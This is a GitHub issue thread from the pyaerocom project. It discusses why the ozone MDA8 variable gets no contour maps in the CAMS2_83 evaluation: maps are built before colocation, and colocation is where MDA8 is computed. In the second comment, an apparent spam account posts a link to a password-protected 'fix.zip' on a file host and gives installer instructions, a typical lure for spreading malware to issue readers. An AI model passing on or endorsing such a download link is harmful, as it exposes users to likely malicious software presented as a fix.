### ISSUE TITLE
mda8 is not computed for the maps

### ISSUE THREAD

**Issue by charlienegri** [metno/pyaerocom#1324]
at least for cams2_83, running with @cams2_83-202408:  
in the output in the `contour` folder we expect 1 file per variable per model and no files for conco3mda8 are produced there
see e.g. `/lustre/storeB/project/fou/kl/CAMS2_83/evaluation/data/cams2-83/forecast-current-season/contour/`  
the api also then throws an error accordingly and there is no data to show https://regional-evaluation.atmosphere.copernicus.eu/pages/maps/?project=cams2-83&experiment=forecast-last-week&station=ALL&parameter=conco3mda8&frequency=daily

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by charlienegri** [comment]
the reason is that the maps calculation happens before colocation and has therefore no notion of mda8 https://github.com/metno/pyaerocom/blob/main-dev/pyaerocom/aeroval/modelmaps_engine.py#L136

**Comment by thorbjoernl** [comment]
It looks like models engine is creating the map based on the model data, while mda8 is calculated based on the colocated data (later in the pipeline). Fixing this probably requires rethinking / restructuring the modelsmap engine quite bit.

**Comment by charlienegri** [comment]
the option of computing the maps as a stand-alone run without the need of colocating is valuable imo, so even rethinking the map engine might not be necessarily a solution in the long run, at present this might be best solved by removing the variable in the drop-down menu for maps only

**Comment by charlienegri** [comment]
the syntax of my fix is wrong and breaks menu.json
